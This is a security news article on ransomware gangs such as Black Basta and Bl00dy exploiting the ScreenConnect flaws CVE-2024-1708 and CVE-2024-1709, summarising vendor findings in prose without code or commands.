More Ransomware Gangs Pounce on ScreenConnect Vulnerabilities

Continued exploitation of ScreenConnect vulnerabilities, identified as CVE-2024-1708 and CVE-2024-1709, adds to the critical need for immediate action, with observed attacks from ransomware actors such as Black Basta and Bl00dy. Trend Micro's analysis outlines their observations of attack chains executed by the threat actors upon the exploitation of these vulnerabilities—present in versions 23.9.7 and earlier—including a path-traversal flaw (CVE-2024-1708) and an authentication bypass (CVE-2024-1709). Exploitation of these vulnerabilities has resulted in ransomware and data theft. An examination of a Black Basta intrusion has been observed deploying Cobalt Strike beacons after exploiting these vulnerabilities.

Trend Micro researchers report attackers initiate their intrusion by executing commands that facilitate reconnaissance, discovery, and privilege escalation, such as enumerating domain trusts and adding new users to the Administrators group. This methodical approach aims at pinpointing high-value targets and expanding their foothold within compromised networks. Adding to the thoroughness of the attackers' meticulous planning, researchers note the use of a script designed to "count the number of computers in the Active Directory environment that have logged on within the past 90 days, which is used to likely identify active targets for further exploitation or lateral movement within the network." This underscores the depth of the threat actors' reconnaissance efforts.The deployment of Cobalt Strike payloads isn't limited to Black Basta as other groups are reported to utilize Cobalt Strike payloads and employ defense evasion techniques like disabling Windows Defender's real-time monitoring to enable the download of their malicious payload. The Bl00dy Ransomware group's activities involved leveraging certutil and PowerShell for the download and execution of their ransomware encryptor.

The use of leaked builders from Conti and LockBit was identified by Trend Micro researchers however, the ransom note is revealed to be distinct from the Bl00dy ransomware gang. Further analysis reveals the exploitation of ScreenConnect vulnerabilities for deploying the XWORM malware and the use of alternative remote management tools or additional instances of ScreenConnect to maintain access and control over victim environments. Trend Micro's investigation into these exploits helps to add urgency in taking the necessary actions to defend against the critical ScreenConnect vulnerabilities. The exploitation of these vulnerabilities, as detailed by Trend Micro, adds to findings from Huntress and Sophos. Huntress's telemetry revealed the deployment of LockBit ransomware, coin miners, SSH tunnels, and various remote monitoring and management tools. Sophos further corroborated the widespread deployment of LockBit ransomware and additionally noted the use of AsyncRAT for system compromise, showcasing the multifaceted threats these vulnerabilities expose systems to.